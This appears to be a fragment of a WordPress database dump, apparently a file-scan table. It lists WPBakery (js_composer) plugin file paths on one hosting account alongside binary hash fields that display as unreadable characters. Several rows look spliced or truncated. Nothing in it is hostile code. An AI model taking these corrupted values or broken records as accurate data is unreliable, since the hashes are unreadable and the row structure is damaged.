V;ơnL{','',0,'?'),('6ʵCU\Z','wp-content/plugins/js_composer/assets/vc/blur.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/blur.svg',0,'oȈ\\$Fbo','oȈ\\$Fbo','d~3:)+\'lm!i]Q⯮v-0','',0,'?'),(';uGBn','wp-content/plugins/js_composer/assets/vc/loaders/spinner-light.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/loaders/spinner-light.svg',0,'w`<','w`<','D.\'/<,B]t?cB\'0KX','',0,'?'),('eIQX}-e%','wp-content/plugins/js_composer/assets/vc/loaders/spinner.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/loaders/spinner.svg',0,'tKjZ','tKjZ','9~09,8*%XJUа','>8*%XJUа','\">#<&nItV6','',0,'?'),('@Ⱦ%[aK}','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-accordion.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-accordion.svg',0,'䕫OqC2<<і','䕫OqC2<<і','0ѹ&-{-:(B΋h+F- U}=^Z','',0,'?'),('i?Rlkg`','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-acf.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-acf.svg',0,'OBƋT\n|X[','OBƋT\n|X[','}\Z$\\6y,N1Oxo_d','',0,'?'),('0E\Z#gzZSh@}','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-button.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-button.svg',0,'IN}0=OG','IN}0=OG','!3^veq۩e:/\'W;wJY=\r','',0,'?'),('Shӌ\0','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-category.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-category.svg',0,'sGh);','sGh);','})6DR48^BB}\'','',0,'?'),('ORP3\r','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-contact-form-7.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-contact-form-7.svg',0,'\nx!R;AJV','\nx!R;AJV','>[@kͪXF3x޺hg','',0,'?'),('nD','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-cta.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-cta.svg',0,'YkVK)<','YkVK)<','Q=A7$N3fvhE','',0,'?'),(';2q|fJtm','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-custom-fields.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-custom-fields.svg',0,'gy\rb','gy\rb','1)zGmRnܐ˹)3\n~','',0,'?'),(';3.k|M7C','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-doughnut-chart.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-doughnut-chart.svg',0,'\rW0kOf,','\rW0kOf,','F٩=ǺHC[o^KQ','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-empty-space.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-empty-space.svg',0,'.{%eT$','.{%eT$','`R7;=7U]kP ','',0,'?'),('xfp(v*(','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-excerpt.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-excerpt.svg',0,'Ge5\')(:©','Ge5\')(:©','宛\'!66E(pj,(&9','',0,'?'),('5)ƥq!=~B','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-facebook.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-facebook.svg',0,'@kͳI mSۖ','@kͳI mSۖ','\"Ҟ ^ex-`kY- a','',0,'?'),('GN2\\6}','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-faq-toggle.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-faq-toggle.svg',0,'<cAd E','<cAd E','ʄ?Owpn.2ZdRJ\\<8x','',0,'?'),('ns\nlGS}5d','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-flickr.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-flickr.svg',0,'[h\0J\0LoW*','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-fonts.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-fonts.svg',0,'|y 4t@@O\ng','|y 4t@@O\ng','G9pb۱Q/7]rw 3e','',0,'?'),('Zl#KpjQQ','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-maps.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-google-maps.svg',0,'=\r\\m1xm;uA','=\r\\m1xm;uA','l!3q~2_i×','Ur&c>×',':I\'}ln=J#}`.\0','',0,'?'),(';bۘ#e','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gravity-forms.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gravity-forms.svg',0,'8>|','8>|','M%.;p+H\nX2','',0,'?'),('`:g&@O','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gutenberg.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-gutenberg.svg',0,'0)^VIjn`','0)^VIjn`','>Q6>6GA\Zl,D+  ͧV','',0,'?'),('cɺ\Zvߕ','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-hover-box.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-hover-box.svg',0,'l &oB','l &oB','L͏=A4Ők|b','',0,'?'),('755:P\'lu','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-icon.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-icon.svg',0,'N wwЁ=','N wwЁ=','lwkheX,$+lCvV`.,','',0,'?'),('MG&!l6\"\r','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-carousel.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-carousel.svg',0,'KIφtM','KIφtM','t\ZFСRX/>','',0,'?'),('%^.(t9[*Z','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-gallery.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-gallery.svg',0,'zD,:','zD,:','C4oH> ؄.7S\n','',0,'?'),('D?&ny¿','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-layer-slider.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-layer-slider.svg',0,'Mua. ','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-grid.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-grid.svg',0,'jH NORwPr','jH NORwPr','+Mv5\\༪/\'_X4zO7f','',0,'?'),('%Lܴ0jp Ԯ\\\\B','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-masonry-grid.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-masonry-grid.svg',0,'>pn3Z&+','>pn3Z&+','fƁ ϛpW=JC]!','',0,'?'),('gw4LRW','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-title.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-title.svg',0,'}Nλ\0Բ>','}Nλ\0Բ>','K,}0f`?U31_TH','',0,'?'),('@m`sX ','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider-2.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider-2.svg',0,'>5^ n7c','>5^ n7c','u߶H\n|xI\'Bhh','',0,'?'),('tnaCpA','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider.svg',0,'J,\\#ʚ<7','J,\\#ʚ<7','\ZWI\n$YQ0@Jy','',0,'?'),('ݺٰG]','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-progress-bar.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-progress-bar.svg',0,'O2j\04I','O2j\04I','b\'k$VuiE\"_8\"/G[;','',0,'?'),('SeKqKn̤','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-html.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-html.svg',0,'o;:(j9OeR','o;:(j9OeR','gfIޢ#(fDP@x !Ӻۛ>B{g','',0,'?'),('۳ d&s>h,','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-js.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-raw-js.svg',0,']ed &@2 {',']ed &@2 {','fR`knZ:V\\iҦ5a\\-jMjי\Z','',0,'?'),('ȂC虧M-\'r','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-revolution-slider.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-revolution-slider.svg',0,'fN\r~9A','fN\r~9A','Ϭ34uds՘Qn`I@','',0,'?'),('O\Z\'Fu{Rn','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-row.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-row.svg',0,'3T<\nAփNJ','3T<\nAփNJ','X\\\0ݨE4ckXVr g\']W','',0,'?'),('oţeZWk\nV','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-section.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-section.svg',0,'<æ\"06P\r','<æ\"06P\r','2ys*ZԚ.mv:%aV{^}','',0,'?'),('Ak_]D@]{','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-with-text.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-with-text.svg',0,'k3Ӳ\ZA1O-]t','k3Ӳ\ZA1O-]t','0.O@!6\0DE_L=yn6','',0,'?'),('Gzktf6\"','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-zig-zag.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-zig-zag.svg',0,'ϜsCo','ϜsCo','\"v`W.K˚P,%q\r^ H','',0,'?'),('ɑGʽ[!','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator.svg',0,'i(MS;','i(MS;','r )XF<%A/ Ph\0b','',0,'?'),('p,t','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-single-image.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-single-image.svg',0,'}|n:|\nhC','}|n:|\nhC','AgKo`4ORfm . ','',0,'?'),('wOuD}/n','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tabs.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tabs.svg',0,'W rrc','W rrc','\r^~-BBwMG \"t&X','',0,'?'),('B@>`KaЅ','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-text-block.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-text-block.svg',0,'.mw̳Fn ','.mw̳Fn ','5\0#`}\rEk_[¸6S4j~Í','',0,'?'),(' \'Q2}rl','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tour.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-tour.svg',0,'jj+v^pz','jj+v^pz',',\ZIIuItP90Rc','',0,'?'),('ba2](<','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-twitter.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-twitter.svg',0,'@x:`j_~/','@x:`j_~/','C.w݂(ːt k7c,','',0,'?'),('\":@6IK','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-vc-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-vc-logo.svg',0,'M*m7m[','M*m7m[','S7n[l\rp[kd0\03','',0,'?'),('E _Q՛,Q>k','wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-video.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-video.svg',0,'SX\\:}柚','SX\\:}柚','5{;C UF >Mf','',0,'?'),('4ދlAFc','',0,'?'),('%UdI4(','wp-content/plugins/js_composer/config/containers/shortcode-vc-column-inner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-column-inner.php',0,'H)_u-:Ǒ','H)_u-:Ǒ','#ZBo9t_~Qj͇0$','',0,'?'),('8H\Z7`','wp-content/plugins/js_composer/config/containers/shortcode-vc-column.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-column.php',0,'yH&#DŢ','yH&#DŢ','\"ISaqOkہQUOKٍ','',0,'?'),('56_Ԫ}\\s/:/zU','wp-content/plugins/js_composer/config/containers/shortcode-vc-row-inner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-row-inner.php',0,'QLR\'Tʂ:}','QLR\'Tʂ:}','JU /oږ7\\g@w(%','',0,'?'),('\'z%*[Kk','wp-content/plugins/js_composer/config/containers/shortcode-vc-row.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-row.php',0,'\0u vL','\0u vL','Ȅ$vj&YRq\\XV9vy','',0,'?'),('Q \'7dYΑ$yt','wp-content/plugins/js_composer/config/containers/shortcode-vc-section.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/containers/shortcode-vc-section.php',0,'|jpJ9\ns','|jpJ9\ns','7..HU7(','',0,'?'),('z1oɼ@Ʌa','wp-content/plugins/js_composer/config/content/shortcode-vc-column-text.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-column-text.php',0,'@9dn^<','@9dn^<','ZV>ZP( 0q\\\\|lC','',0,'?'),('%\ZS1\0\nVDV','wp-content/plugins/js_composer/config/content/shortcode-vc-custom-heading.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-custom-heading.php',0,'Дyݙtj','Дyݙtj','440Ŷo$(>^^jTzL 40','',0,'?'),('~e<l','wp-content/plugins/js_composer/config/content/shortcode-vc-empty-space.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-empty-space.php',0,'#݁޹=\"','#݁޹=\"','95a\0&v뽼1}ߊ[Qɍ,','',0,'?'),(';l?[wr','wp-content/plugins/js_composer/config/content/shortcode-vc-flickr.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-flickr.php',0,'\06Jt8I','\06Jt8I','\0v\n73ѾCĎ8S]+ũ 3W','',0,'?'),(' lÒ-;P\'@','wp-content/plugins/js_composer/config/content/shortcode-vc-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-gallery.php',0,'LuJ%%t}','LuJ%%t}','&mИ8bhi','3$ FB >i','\'Q~0 l\'24WC6ATKfij!w','',0,'?'),('bµ<$V','wp-content/plugins/js_composer/config/content/shortcode-vc-hoverbox.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-hoverbox.php',0,'B,Z]FM','B,Z]FM','YRea˷uKj,Dj8','',0,'?'),('j?btB<','wp-content/plugins/js_composer/config/content/shortcode-vc-icon.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-icon.php',0,'^sx6Ի>~h','^sx6Ի>~h','KKKQ}Ju&!P})D','',0,'?'),('ۛs5r0~n)','wp-content/plugins/js_composer/config/content/shortcode-vc-images-carousel.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-images-carousel.php',0,'&fSz^','&fSz^','j:IIFҒ}*;A&ZNJ','',0,'?'),('Olig>6(','wp-content/plugins/js_composer/config/content/shortcode-vc-line-chart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-line-chart.php',0,'%:01B','%:01B','ÅjѢ໴z#\Zm Dp{t','',0,'?'),('N 6Gotea','wp-content/plugins/js_composer/config/content/shortcode-vc-message.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-message.php',0,'!ՎfbK','!ՎfbK','W69ޒzTÐc(uD','',0,'?'),('akgj#Q*','wp-content/plugins/js_composer/config/content/shortcode-vc-pie.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-pie.php',0,'I&rfE>ԣfY4','I&rfE>ԣfY4','A]jl.zw w_KZ','',0,'?'),('\r\n\'\'oχMg','wp-content/plugins/js_composer/config/content/shortcode-vc-posts-slider.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-posts-slider.php',0,';PYHE^XE/',';PYHE^XE/','9k@T׻c.#*','',0,'?'),('*f{Krђ|Ѵ','wp-content/plugins/js_composer/config/content/shortcode-vc-progress-bar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-progress-bar.php',0,'-\nCOw','-\nCOw','6F#{\\+ؼ_,[>˻\\M[','',0,'?'),('7&O׽U*}','wp-content/plugins/js_composer/config/content/shortcode-vc-round-chart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-round-chart.php',0,'M LA4a','M LA4a','`?\\@\ń]+Y6GjJ{(޺','',0,'?'),('\\щu<\"Yڜ','wp-content/plugins/js_composer/config/content/shortcode-vc-separator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-separator.php',0,'lJMv|w','lJMv|w','\'=,eht4a\0wݡ','',0,'?'),('of>}uH[?','wp-content/plugins/js_composer/config/content/shortcode-vc-single-image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-single-image.php',0,'͏gd_','͏gd_','5$D;*/','{=j;>*/','#6B8I8tI8RKfw','',0,'?'),('77ޖz','wp-content/plugins/js_composer/config/content/shortcode-vc-video.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-video.php',0,'ǫ@[2`!','ǫ@[2`!','wQ\Zv @,E& 0','',0,'?'),('mhZʘd=4]m','wp-content/plugins/js_composer/config/content/shortcode-vc-zigzag.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/shortcode-vc-zigzag.php',0,'MыQJp','MыQJp','__F ޹Y$a(j:q\Z@q','',0,'?'),('\'׊Kggk &UB$!','wp-content/plugins/js_composer/config/content/vc-custom-heading-element.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/vc-custom-heading-element.php',0,'p\0QY1$','p\0QY1$','npCA\"pŹ+&;C','',0,'?'),('˳^c ۈJ','wp-content/plugins/js_composer/config/content/vc-icon-element.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/content/vc-icon-element.php',0,'1rKr','1rKr','=ą+B\0?H;SX','',0,'?'),(' OZ̯qq','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion-tab.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion-tab.php',0,'%U&z#','%U&z#','>|jTxq 6b)\0xA','',0,'?'),('(+ja>X3a!L','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-accordion.php',0,'G!@gC','G!@gC','临`67+*`ޣD!b3ި','',0,'?'),(']M̕G0_\r','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button.php',0,'9[ | `^+o6:','9[ | `^+o6:','\"(@7ju\rUE\n?%73գ','',0,'?'),('B%~}x P','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-button2.php',0,'޼(uI5','޼(uI5','@f7.46t\0;T','',0,'?'),('tل\ZqC~','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button.php',0,'ZJ {','ZJ {','/&y^wGP|w_g8b2+h','',0,'?'),('!zhyyn^-}Ƚ','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button2.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-cta-button2.php',0,'\'J:#bĜ iP2_','\'J:#bĜ iP2_','-K%@Gd #)5i.','',0,'?'),('&vi\'^L$','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-googleplus.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-googleplus.php',0,'Zo sb涎0n','Zo sb涎0n','1L\0_0Lp/2EX{Hs','',0,'?'),('uՋlN]NB\"c','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tab.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tab.php',0,'5IzĪ:i','5IzĪ:i','T-t`Κ |8Ҭ*Q\ra7[35H','',0,'?'),('טQfD !;{','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tabs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tabs.php',0,'|M~0\"@5(','|M~0\"@5(','4 ?x.] NxT]r5˙','',0,'?'),('JmO` f','wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tour.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/deprecated/shortcode-vc-tour.php',0,'5lwׯъ',';XW>ъ','%ly3ժak@\\,Guy_/y','',0,'?'),(']4 Թ-6$\"','wp-content/plugins/js_composer/config/grids/shortcode-vc-masonry-grid.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/grids/shortcode-vc-masonry-grid.php',0,'ƀ|[bq#T#X','ƀ|[bq#T#X','N[/\n9}ʇX \\zLH:vs5','',0,'?'),('4\n=E\Z','wp-content/plugins/js_composer/config/social/shortcode-vc-tweetmeme.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/social/shortcode-vc-tweetmeme.php',0,'?Fjtz?=.','?Fjtz?=.','.uyrUͱ6:M*','',0,'?'),(')M Ԝ','wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-html.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-html.php',0,'.p&En|.','.p&En|.','qt03<_ֿDֲq*ZC-Y#<','',0,'?'),('[K\"z','wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-js.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/structure/shortcode-vc-raw-js.php',0,'ƹύAZ5]q','ƹύAZ5]q','%Z1:$I@8MʈdQy‰ c','',0,'?'),('0?X8o','wp-content/plugins/js_composer/config/structure/shortcode-vc-widget-sidebar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/structure/shortcode-vc-widget-sidebar.php',0,'I;O','I;O','p(q\r\n-J]\r\0Оҭ[r\\W\r','',0,'?'),(':\Z S!3','wp-content/plugins/js_composer/config/templates.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/templates.php',0,' E)nᦗ!',' E)nᦗ!','9 $ŦtB^ܮ`x,`','',0,'?'),('^{8=+ITD','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-accordion.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-accordion.php',0,'̧3EbyN7JC','̧3EbyN7JC','k^`̟H;ҐܓkN\r','',0,'?'),('S2?> i&qx^ ','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-pageable.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-pageable.php',0,'Ov\\','Ov\\','l`U!v\"DBv[m_ 6|N','',0,'?'),('msJ{ *{4','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-section.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-section.php',0,'yp;{b','yp;{b',';p1\Z\Zn\n&d-d?}','',0,'?'),('8Fgs8\Z','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tabs.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tabs.php',0,'\n Q|_wӂ','\n Q|_wӂ','m:#AVo2cKhl','',0,'?'),('$ad5T','wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tour.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/tta/shortcode-vc-tta-tour.php',0,'#F3Jˈ[','#F3Jˈ[','`hv2̇E[4΄S^qi2Q9!','',0,'?'),('#9v:Hk;Lt','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-archives.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-archives.php',0,'L&^Z8SF','L&^Z8SF','Ih\rMغ`9*\'b4_z\"\'G\'z(','',0,'?'),('\"F`;iv\" |I','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-calendar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-calendar.php',0,'ʹg9s։','ʹg9s։','J#9_jbSs\\eUcdd2','',0,'?'),('2%','/ؽ>2%','|bT^S,O#aK,Ĭv\"eB','',0,'?'),('JAä#y','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-custommenu.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-custommenu.php',0,'U5IJ̋','U5IJ̋','ѺBҬշArNJAW$Qp','',0,'?'),(';v0c','wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-links.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-links.php',0,'{9_ϡ\rA\0','{9_ϡ\rA\0','?m_ypfE,1S2\rǿNoF$T','',0,'?'),('(!]ErvK U8','wp-content/plugins/js_composer/include/autoload/params-to-init.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/params-to-init.php',0,'I8>뽊Rv','I8>뽊Rv','R}12spzttYtN6,f','',0,'?'),('u6_(]v҅l','wp-content/plugins/js_composer/include/autoload/post-type-default-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/post-type-default-template.php',0,'xʚ)@.i','xʚ)@.i',' (@9~묪yȣ\nv ','',0,'?'),('%$g3dN3','wp-content/plugins/js_composer/include/autoload/ui-vc-pointers.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/ui-vc-pointers.php',0,'Nz-8nVv~','Nz-8nVv~','S%[nL!VnTQ','',0,'?'),('Dnvow\'E;p','wp-content/plugins/js_composer/include/autoload/vc-grid-item-editor.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-grid-item-editor.php',0,'izd','izd','.8gGx鏸Uu2+_!;f','',0,'?'),('ѕl|,:R8 s(H','wp-content/plugins/js_composer/include/autoload/vc-image-filters.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-image-filters.php',0,'`leOä','`leOä','dbO6 \rEwQy*_5','',0,'?'),('-\"Zc1&?zjEe','wp-content/plugins/js_composer/include/autoload/vc-pages/automapper.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/js_composer/include/autoload/vc-pages/automapper.php',0,'\rhf:$R֠̓','\rhf:$R֠̓','*}ZXEK\r`a}q 